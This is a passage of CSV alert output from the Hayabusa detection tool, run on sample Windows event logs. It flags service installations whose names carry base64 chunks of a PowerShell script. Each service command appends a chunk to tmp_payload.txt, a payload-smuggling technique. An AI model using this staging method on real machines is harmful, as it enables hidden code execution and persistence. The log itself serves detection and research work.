+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YgKCRPUyAtbGlrZSAiKlNlcnZlciAyMDAzKiIgLW9yICRPUyAtbGlrZSAiKldpbmRvd3MgWFAqIil7DQoNCiAgICAgICAgICAgICAgICBXcml0ZS1Ib3N0ICIkT1MgaXMgYW4gb2xkIE9wZXJhdGlu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg26"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:52.852 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:52.852 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:52.852 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZyBTeXN0ZW0sIENvbGxlY3RpbmcgJExvZ05hbWUgRXZlbnQgTG9nIEluZm9ybWF0aW9uIHZpYSBXTUksIHRoaXMgbWF5IHRha2Ugc29tZSB0aW1lIg0KDQogICAgICAgICAgICAgICAgJHdtaV9ldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg27"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:54.314 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:54.314 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:54.314 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VudGxvZ3N1bW1hcnkgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9OVEV2ZW50TG9nRmlsZSAtY29tcHV0ZXJuYW1lICRBZ2VudCAtQ3JlZGVudGlhbCAkR2xvYmFsOkNyZWQgLWZpbHRlciAi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg28"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:55.766 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:55.766 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:55.766 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: TG9nRmlsZU5hbWUgPSAnJExvZ05hbWUnIg0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9ICR3bWlfZXZlbnRsb2dzdW1tYXJ5Lk51bWJlck9mUmVjb3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg29"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:57.209 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:57.209 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:57.209 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Jkcw0KDQogICAgICAgICAgICAgICAgJExvZ1NpemUgPSAoJHdtaV9ldmVudGxvZ3N1bW1hcnkuRmlsZVNpemUgLyAxTUIpDQogICAgIA0KICAgICAgICAgICAgICAgICR3bWlfZXZlbnRsb2dkYXRh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg30"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:58.646 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:58.646 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:15:58.646 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ID0gR2V0LVdNSW9iamVjdCAtQ29tcHV0ZXJOYW1lICRjb21wdXRlciAtQ3JlZGVudGlhbCAkY3JlZCAtcXVlcnkgIlNlbGVjdCAqIGZyb20gV2luMzJfTlRMb2dFdmVudCBXaGVyZSBMb2dmaWxlID | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg31"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:00.100 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:00.100 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:00.100 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0gJ2FwcGxpY2F0aW9uJyINCg0KICAgICAgICAgICAgICAgICRnZXR3bWlvbGRldmVudCA9ICAkd21pX2V2ZW50bG9nZGF0YXwgc2VsZWN0IC1sYXN0IDENCg0KICAgICAgICAgICAgICAgICRnZXR3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg32"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:01.552 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:01.552 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:01.552 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bWluZXdlc3QgPSAkd21pX2V2ZW50bG9nZGF0YSB8IHNlbGVjdCAtZmlyc3QgMQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRPbGRlc3RFdmVudFRpbWUgPSBbbWFuYWdlbWVudC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg33"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:02.992 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:02.992 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:02.992 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 5tYW5hZ2VtZW50RGF0ZVRpbWVDb252ZXJ0ZXJdOjpUb0RhdGVUaW1lKCRnZXR3bWlvbGRldmVudC5UaW1lR2VuZXJhdGVkKSAgICAgICAgDQoNCiAgICAgICAgICAgICAgICAkTmV3ZXN0RXZlbnRU | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg34"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:04.456 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:04.456 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:04.456 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aW1lID0gW21hbmFnZW1lbnQubWFuYWdlbWVudERhdGVUaW1lQ29udmVydGVyXTo6VG9EYXRlVGltZSgkZ2V0d21pbmV3ZXN0LlRpbWVHZW5lcmF0ZWQpDQoNCg0KICAgICAgICAgICAgICAgIH0NCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg35"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:05.897 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:05.897 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:05.897 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICAgICAgZWxzZSB7DQoNCiAgICAgICAgICAgICRUb3RhbExvZ0V2ZW50cyA9IChHZXQtV2luRXZlbnQgLUxpc3RMb2cgJExvZ05hbWUgLUNvbXB1dGVyTmFtZSAkQWdlbnQgLUNyZWRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg36"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:07.351 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:07.351 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:07.351 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bnRpYWwgJEdsb2JhbDpDcmVkKS5SZWNvcmRDb3VudA0KDQogICAgICAgICAgICAkTG9nU2l6ZSA9ICgoR2V0LVdpbkV2ZW50IC1MaXN0TG9nICRMb2dOYW1lIC1Db21wdXRlck5hbWUgJEFnZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg37"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:08.797 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:08.797 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:08.797 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuRmlsZVNpemUgLyAxTUIpICMgU2V0IHRvIE1CDQogICAgICAgICAgICANCiAgICAgICAgICAgICMkTG9nU2l6ZSA9IFttYXRoXTo6Um91bmQoKCRMb2dT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg38"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:10.344 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 